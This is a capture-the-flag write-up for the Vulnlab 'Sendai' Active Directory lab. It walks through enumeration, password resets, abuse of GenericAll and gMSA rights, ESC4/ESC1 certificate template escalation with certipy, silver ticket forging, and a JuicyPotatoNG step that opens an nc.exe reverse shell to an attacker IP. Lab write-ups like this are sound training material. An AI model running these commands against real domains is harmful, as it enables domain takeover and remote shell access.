Vulnlab — Sendai
Sendai involved enumerating usernames through smb shares having password expired, resetting their password, belonging to Support group they had GenericAll on ADMSVC group which had ReadGMSAPassword on MGTSVC$ , enumerating the system to find clifford’s password which was part of ca-operators group having full control over SendaiComputer template making it vulnerable to ESC4, then changing the configuration to make it vulnerable to ESC1, escalating to domain admin.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: DNS:dc.sendai.vl
| Issuer: commonName=dc.sendai.vl
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Supported Methods: GET
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=dc.sendai.vl
| Issuer: commonName=dc.sendai.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-04T16:24:01
| Not valid after: 2024-11-03T16:24:01
| MD5: 6198fc32527e478294e38fd5c6a2b81e
|_SHA-1: 73b4d1026b49e0cb9c0d633982377e74f32b7db3
|_ssl-date: 2024-05-05T16:28:56+00:00; -1m22s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open unknown
56740/tcp open unknown
56744/tcp open unknownPORT 80/443
Running gobuster, we can find /service
However this endpoints shows that we don’t have access to it
PORT 445
Enumerating smb shares with anonymous login, we’ll see config, sendai and Users share, where config was not accessible, Users didn't anything but sendai had some interesting files
The incident talked about users having weak passwords, all users will be prompted to change their password on logging in, the transfer directory had user’s directories
Resetting domain user’s password
These users can also be enumerated through lookupsid by brute forcing sids
On trying to login with null password, we’ll get two users with password to be changed
Password can be changed with impacket-smbpasswd
impacket-smbpasswd sendai.vl/Thomas.Powell@dc.sendai.vl -newpass '$aduwu123'From config share, we can grab .sqlconfig having credentials to MSSQL
But this service isn’t exposed to us so moving on to enumerating the domain with bloodhound
python3 bloodhound.py -u sqlsvc -p password -d sendai.vl -c all -dc dc.sendai.vl -ns 10.10.104.41Thomas.Powell is a member of Support group has GenericAll on ADMSVC group which has ReadGMSAPassword on MGTSVC$ account. We'll need to add thomas in ADMSVC group, read the NThash of MGTSVC account
Abusing GenericAll and reading GMSA password
Through bloodyAD we can add thomas in ADMSVC group having genericall rights
python3 bloodyAD.py --host "10.10.104.41" -d 'sendai.vl' -u 'thomas.powell' -p '$aduwu123' add groupMember ADMSVC thomas.powellWith gmsadumper script or with netexec we can dump the nthash of mgtsvc account
python3 gMSADumper.py -u 'thomas.powell' -p '$aduwu123' -d sendai.vl -l 10.10.104.41This account can login on DC as it’s part of Remote Management group
Checking the privileges after logging in through evil-winrm, it doesn’t have any privilege that we can abuse to get local admin
Obtaining clifford’s password
From the running process, we have helpdesk which doesn’t normally run on a system
Enumerating the system with PrivescCheck.ps1
This will list down the running processes from where we’ll find the clifford.davey’s creds
Enumerating ADCS
This user belongs to CA-Operators group, so he likely will be able to enroll in a custom template, enumerating templates with certipy
Escalating privileges through ESC4
certipy find -u clifford.davey -vulnerable -target dc.sendai.vl -dc-ip 10.10.115.126 -stdoutThis lists down a template SendaiComputer which has EKU set to Client Authentication that can be used to authenticate on the system and ca-operators group has Full control over this template which means we can edit this template and impersonate as the domain admin, which is known as ESC4 (access control) abuse
With certipy, we can change the configuration of this template to allow domain users to enroll for this template and impersonate any user
certipy template -u clifford.davey -target dc.sendai.vl -dc-ip 10.10.115.126 -template SendaiComputercertipy req -u 'clifford.davey' -ca 'sendai-DC-CA' -dc-ip 10.10.115.126 -target dc.sendai.vl -template 'SendaiComputer' -upn administratorcertipy auth -pfx ./administrator.pfx -domain sendai.vlEscalating with SeImpersonate privilege
Another way of escalating privileges is through mssql, since mssql is running internally, having access on the machine we can port forward withchisel
chisel server -p 2222 --reverse
chisel.exe client 10.8.0.136:2222 R:socksBut we’ll get login denied for sqlsvc account
With ticketer, forging a silver ticket for accessing MSSQL service as an administrator
ticketer.py -domain-sid S-1-5-21-3085872742-570972823-736764132 -domain sendai.vl -spn MSSQL/dc.sendai.vl -nthash hash AdministratorEnabling xp_cmdshell which will allow us to execute system commands as sqlsvc
The difference here is that we’ll have SeImpersonate privilege, which can abuse to get local admin
Using juicypotato-ng to abuse the privilege and get a shell a SYSTEM
.\JuicyPotatoNG.exe -t * -p "C:\Windows\system32\cmd.exe" -a "/c C:\Users\sqlsvc\nc.exe 10.8.0.136 4444 -e cmd.exe"
